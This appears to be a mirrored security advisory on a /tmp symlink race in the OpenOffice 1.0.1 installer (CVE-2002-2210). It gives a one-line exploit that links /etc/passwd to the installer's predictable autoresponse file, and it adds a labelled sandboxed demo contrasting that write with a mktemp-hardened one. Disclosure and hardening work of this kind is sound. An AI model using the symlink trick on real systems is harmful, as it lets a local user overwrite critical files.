OpenOffice 1.0.1 Race condition during installation

2018.10.02
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 6.2/10
Impact Subscore: 10/10
Exploitability Subscore: 1.9/10
Exploit range: Local
Attack complexity: High
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Title: OpenOffice 1.0.1 Race condition during installation
Author: Larry W. Cashdollar, @_larry0
Date: 2009-09-02
CVE-ID: [CVE-2002-2210]
Download Site: http://www.openoffice.org/dev_docs/source/1.0.1/index.html
Vendor: Open Office
Vendor Notified: 2009-09-02
Vendor Contact: bugtraq
Advisory: http://www.vapid.dhs.org/advisories/openoffice_race_condition_during_installation.html
Description: The OpenOffice desktop suite.
Vulnerability: A very simple and easy to exploit race condition exists during the installation of OpenOffice. During this window a malicious user could create a symlink in /tmp and overwrite arbitrary files.
Exploit Code: As a normal user:

lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf

will result in the password file being overwritten with:

# create the proper autoresponse file
<file>
cat << EOF > /tmp/${USER}autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oohome
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>
[JAVA]
JavaSupport=preinstalled_or_none
EOF
</file>
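The file-creation pattern shown above, next to a hardened alternative, as an added example that is not part of the original advisory or the OpenOffice installer. The function names, the sandbox directory standing in for /tmp, and the victim file are constructed for illustration.

```shell
#!/bin/sh
# Added example, not OpenOffice installer code. All paths are constructed.

# Pattern from the advisory: a fixed, guessable file name in a shared
# directory. The shell's ">" redirection follows a symlink at that path.
write_predictable() {
    dir=$1
    cat << EOF > "$dir/${USER:-user}autoresponse.conf"
[ENVIRONMENT]
INSTALLATIONTYPE=STANDARD
EOF
}

# Hardened pattern: mktemp creates a new file exclusively (mode 0600) under
# an unpredictable name, so a pre-planted symlink is never opened.
write_hardened() {
    dir=$1
    conf=$(mktemp "$dir/autoresponse.XXXXXX") || return 1
    cat << EOF > "$conf"
[ENVIRONMENT]
INSTALLATIONTYPE=STANDARD
EOF
    printf '%s\n' "$conf"
}

# Runs both writers inside a throwaway directory that stands in for /tmp,
# with a symlink already present at the predictable name.
demo() {
    sandbox=$(mktemp -d) || return 1
    printf 'original\n' > "$sandbox/victim"
    ln -s "$sandbox/victim" "$sandbox/${USER:-user}autoresponse.conf"

    conf=$(write_hardened "$sandbox") || return 1
    after_hardened=$(cat "$sandbox/victim")       # victim untouched
    write_predictable "$sandbox"
    after_predictable=$(head -n 1 "$sandbox/victim")  # victim replaced

    rm -rf "$sandbox"
    printf '%s|%s\n' "$after_hardened" "$after_predictable"
}

demo
```

The first field of the output is the victim file's content after the hardened write, the second its first line after the predictable-name write.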

References:

http://www.vapidlabs.com/advisory.php?v=83

